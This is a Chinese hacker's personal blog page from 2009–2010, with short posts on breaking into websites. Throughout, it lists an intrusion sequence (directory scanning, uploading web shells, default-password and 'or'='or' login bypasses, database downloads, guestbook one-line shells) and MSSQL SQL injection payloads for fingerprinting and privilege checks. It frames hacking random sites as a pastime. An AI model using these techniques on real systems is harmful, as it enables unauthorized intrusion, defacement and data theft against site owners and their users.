2010年12月29日 星期三 21:57
2009年12月14日 星期一 16:25
2009年10月25日 星期日 13:21
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!
2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;
|
2009年10月25日 星期日 13:13
文件: D:\暗组2010.exe
大小: 2730807227 字节
修改时间: 2009年7月18日, 8:13:24
MD5: 2DF11BA2C46E5ED055E387C78CBA834C
SHA1: ABDD4E25ECAAC59E3774E84348FFFB6C038788D4
| |
2009年10月24日 星期六 21:16
没事干 黑个站耍耍 |
2009年10月24日 星期六 16:43
拿站的顺序 :(顺序不一定完全正确只当参考) 下面有示例教程
1、确定目标 (因为只是个思路 我就随便找个 为了教程的真实性也没有准备)
2、查找后台
3、利用默认密码和弱口令登陆(admin admin888 'or'='or' ……)
也就是得到 登陆页面后用上面的几个默认密码进行登陆 运气好的话是可以成功的
4、上传漏洞 (dv抓包 nc上传)
5、数据库下载 (辅臣数据浏览器、数据库助手等)
6、查找注入漏洞
7、留言本插入一句话(比较少)
8、旁注 等…… |
2009年10月24日 星期六 16:30
1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
| |
2009年10月24日 星期六 16:15
and exists (select * from sysobjects) //判断是否是MSSQL
and exists(select * from tableName) //判断某表是否存在..tableName为表名
and 1=(select @@VERSION) //MSSQL版本
And 1=(select db_name()) //当前数据库名
and 1=(select @@servername) //本地服务名
and 1=(s |
2009年10月24日 星期六 15:26
一种是通过conn.asp获知数据库帐户密码以后
自己构造,另一个是通过搜索查看源代码构造注入点。
第一种:适用条件:
| |
2009年10月23日 星期五 12:02
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
and char(124)%2Buser%2Bchar(124)=0
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索类型
|
|
|
 hb_hacker
男, 岁
山西 临汾
欢迎大家与我交换友情连接 做连接的先吧本站做上连接 在博客留言即可!
宣言:技信无处不在,兄弟永远存在.
无兄弟不黑客,无兄弟不上线
没有鸡一样让你下线,没有工具一样让你关站.
1、哥闲得蛋疼,但不寂寞。
2、哥不在江湖,江湖都有哥的传说!
3、世上本没有哥,但迷哥的人多了,就开始出现了哥!
4、哥不寂寞,因为有寂寞陪着哥。
5、不要打哥的电话,哥玩的不是寂寞……是哥的手机丢了!
6、哥用微笑保持低调,却不知道微笑也让世界烦恼。
7、哥抽的是寂寞,吐出来的是烟。
8、哥泡的不是姐,是姐的寂寞。
9、哥就是把姐搂在怀里,也不过是两个人的寂寞!
地址:山西霍州
|
|
a
|
添加
